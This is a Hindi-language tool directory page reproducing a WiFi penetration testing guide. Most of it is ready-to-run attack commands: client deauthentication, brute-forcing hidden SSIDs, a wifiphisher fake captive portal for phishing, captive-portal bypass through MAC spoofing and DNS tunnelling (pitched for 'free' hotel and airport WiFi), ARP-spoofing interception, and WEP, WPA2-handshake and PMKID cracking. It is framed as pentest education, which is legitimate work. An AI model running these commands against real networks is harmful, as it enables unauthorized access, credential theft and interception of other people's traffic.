Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wifi-pentesting-guide — WiFi प्रवेश परीक्षण मार्गदर्शिका | Kitploit
उपकरण/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
पासवर्ड क्रैकिंगवाई-फाई ऑडिटिंगजानकारी एकत्र करनापोस्ट-शोषणवायरलेस सुरक्षापेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगलर्निंग और शिक्षा
GitHubricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

WiFi प्रवेश परीक्षण मार्गदर्शिका

रिपॉजिटरी देखें
734113352 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

वाई-फाई पैठ परीक्षण मार्गदर्शिका

अनुक्रमणिका

  1. मूल आदेश

  2. खुले नेटवर्क

    2.1. कैप्टिव पोर्टल

    2.2. मैन-इन-द-मिडिल हमला

  3. WEP क्रैकिंग

    3.1. कोई क्लाइंट नहीं

  4. WPA2-PSK क्रैकिंग

    4.1. 4-तरफा हैंडशेक क्रैक करना

    4.2. PMKID हमला

    4.3. AP-रहित हमला

  5. WPA2-एंटरप्राइज

    5.1. नकली एक्सेस पॉइंट

    5.2. बु्रूट फोर्स

    5.3. समर्थित EAP विधियाँ

  6. अन्य हमले

    6.1. Krack हमला और Frag हमला

    6.2. OSINT

    6.3. वाई-फाई जैमिंग

    6.4. अन्य फ्रेमवर्क

  7. पोस्ट-एक्सप्लॉयटेशन

    7.1. राउटर पर हमला

    7.2. स्कैनर्स के प्रकार

    7.3. स्पूफिंग



1. मूल आदेश

पर्यावरण चर सेट करें

VARIABLE=value

इंटरफ़ेस मोड जांचें

iwconfig $IFACE

इंटरफ़ेस स्थिति जांचें

ifconfig $IFACE

मॉनिटर मोड सेट करें

airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

नेटवर्क सूचीबद्ध करें

  1. मॉनिटर मोड सेट करें

  2. Airodump-ng चलाएं

airodump-ng $IFACE -c $CHANNEL -e $ESSID

डिऑथेंटिकेशन

  1. केवल एक क्लाइंट
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. एक एक्सेस पॉइंट (= AP में सभी क्लाइंट)
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

क्लाइंट के साथ छिपा SSID प्राप्त करें

  1. नेटवर्क सूचीबद्ध करें

Airodump-ng का उपयोग करके नेटवर्क सूचीबद्ध करें और AP का MAC पता ($AP_MAC) और क्लाइंट का एक पता ($CLIENT_MAC) प्राप्त करें। कैप्चर को रोकें नहीं।

  1. डिऑथेंटिकेट करें

एक अन्य टर्मिनल में, किसी क्लाइंट या सभी को डिऑथेंटिकेट करें। जब Airodump-ng इस नेटवर्क से हैंडशेक कैप्चर करता है, तो नाम या ESSID पहले टर्मिनल में दिखाई देगा:

aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

क्लाइंट के बिना छिपा SSID प्राप्त करें

  1. नेटवर्क सूचीबद्ध करें

Airodump-ng का उपयोग करके नेटवर्क सूचीबद्ध करें और AP का MAC पता ($AP_MAC) और क्लाइंट का एक पता ($CLIENT_MAC) प्राप्त करें। कैप्चर को रोकें नहीं।

2.a. एक शब्दकोश हमला निष्पादित करें

mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. या एक ब्रूटफोर्स हमला निष्पादित करें

mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

कैरेक्टर सेट के लिए l (लोअरकेस अक्षर), u (अपरकेस अक्षर), n (संख्याएँ), c (लोअरकेस+अपरकेस), m (लोअरकेस+अपरकेस+संख्याएँ) या a (सभी मुद्रित) का उपयोग संभव है।



2. खुले नेटवर्क

2.1. कैप्टिव पोर्टल

2.1.1. नकली कैप्टिव पोर्टल

  1. HTTrack का उपयोग करके एक वेबसाइट क्लोन करें

  2. Wifiphiser इंस्टॉल करें। HTTrack परिणाम को wifiphisher/data/phishing-pages/new_page/html में एक नए फ़ोल्डर में और एक कॉन्फ़िगरेशन फ़ाइल wifiphisher/data/phishing-pages/new_page/config.ini में जोड़ें।

  3. python setup.py install या bin में बाइनरी का उपयोग करके प्रोजेक्ट को पुनः संकलित करें।

  4. hostapd इंस्टॉल करने के बाद यह कमांड नवीनतम Kali रिलीज़ में सही ढंग से काम करता है:

cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. बायपास 1: MAC स्पूफिंग

कैप्टिव पोर्टल को बायपास करने की पहली विधि है अपने MAC पते को पहले से प्रमाणित उपयोगकर्ता के पते में बदलना।

  1. नेटवर्क को स्कैन करें और IP और MAC पतों की सूची प्राप्त करें। आप उपयोग कर सकते हैं:
  • nmap

  • एक कस्टम स्क्रिप्ट जैसे यह (Bash) या यह (Python)

  1. अपने IP और MAC पते बदलें। आप उपयोग कर सकते हैं:
  • macchanger

  • एक कस्टम स्क्रिप्ट जैसे यह(Bash)

साथ ही, आप प्रक्रिया को स्वचालित करने के लिए स्क्रिप्ट का उपयोग कर सकते हैं जैसे:

  • Poliva script

  • Hackcaptiveportals


2.1.3. बायपास 2: DNS टनलिंग

दूसरी विधि DNS टनल बनाना है। इसके लिए, अपना स्वयं का एक सुलभ DNS सर्वर होना आवश्यक है। आप इस विधि का उपयोग कैप्टिव पोर्टल को बायपास करने और होटल, हवाई अड्डों आदि में 'मुफ्त' वाई-फाई प्राप्त करने के लिए कर सकते हैं।

  1. जाँचें कि डोमेन नाम हल हो रहे हैं:
nslookup example.com
  1. 2 DNS रिकॉर्ड बनाएं (Digital ocean, Afraid.org...):
  • एक 'A रिकॉर्ड': dns.$DOMAIN जो $SERVER_IP की ओर इंगित करता है (उदाहरण: dns.domain.com 139.59.172.117)

  • एक 'NS रिकॉर्ड': hack.$DOMAIN जो dns.$DOMAIN की ओर इंगित करता है (उदाहरण: hack.domain.com dns.domain.com)

  1. सर्वर में निष्पादन
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. यहाँ जांचें कि यह सही ढंग से काम करता है

  2. क्लाइंट में निष्पादन

iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. टनल बनाएं
ssh -D 8080 [email protected]

2.2. मैन-इन-द-मिडिल हमला

एक बार जब आप नेटवर्क में हों, तो आप परीक्षण कर सकते हैं कि क्या यह मैन-इन-द-मिडिल हमलों के लिए संवेदनशील है।

  1. Ettercap का उपयोग करके ARP स्पूफिंग हमला

  2. Wireshark या TCPdump का उपयोग करके ट्रैफ़िक सूँघें

  3. PCredz (Linux) या Network Miner (Windows) का उपयोग करके ट्रैफ़िक का विश्लेषण करें



3. WEP क्रैकिंग

  1. कैप्चर शुरू करें
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. फ़ेक ऑथेंटिकेशन + ARP रिक्वेस्ट रीप्ले हमला + उपयोगकर्ता को डिऑथेंटिकेट करें का उपयोग करके IV कैप्चर को तेज़ करें। लगभग 100,000 विभिन्न IVs पर Airodump रोकें।
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Aircrack-ng का उपयोग करके पासवर्ड क्रैक करें
aircrack-ng $PCAP_FILE


4. WPA2-PSK क्रैकिंग

4.1. 4-तरफा हैंडशेक क्रैक करना

  1. कैप्चर शुरू करें
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. एक उपयोगकर्ता को डिऑथेंटिकेट करें। जब आप 'WPA handshake: $MAC' संदेश देखें, तो airodump कैप्चर रोकें।
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. विकल्प 1: Aircrack-ng का उपयोग करके हैंडशेक क्रैक करें
aircrack-ng -w $WORDLIST capture.cap

आप यहाँ से शब्दसूचियाँ प्राप्त कर सकते हैं।

  1. विकल्प 2: Pyrit का उपयोग करके हैंडशेक क्रैक करें
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. PMKID हमला

आप इस स्क्रिप्ट का उपयोग कर सकते हैं या इन चरणों का पालन कर सकते हैं:

  1. Hcxdumptool और Hcxtool इंस्टॉल करें (आप इस स्क्रिप्ट का उपयोग कर सकते हैं)।

  2. नेटवर्क मैनेजर रोकें

airmon-ng check kill

3a. यदि आप किसी विशिष्ट MAC पते पर हमला करना चाहते हैं

  • एक टेक्स्ट फ़ाइल ($FILTER_FILE) बनाएं और MAC पता ':' के बिना जोड़ें। आप sed का उपयोग कर सकते हैं और आउटपुट को एक फ़ाइल में रीडायरेक्ट कर सकते हैं:
echo $MAC | sed 's/://g' > $FILTER_FILE
  • PMKID कैप्चर करें
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. $HASH_FILE बनाएं
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
टूल डाउनलोड करें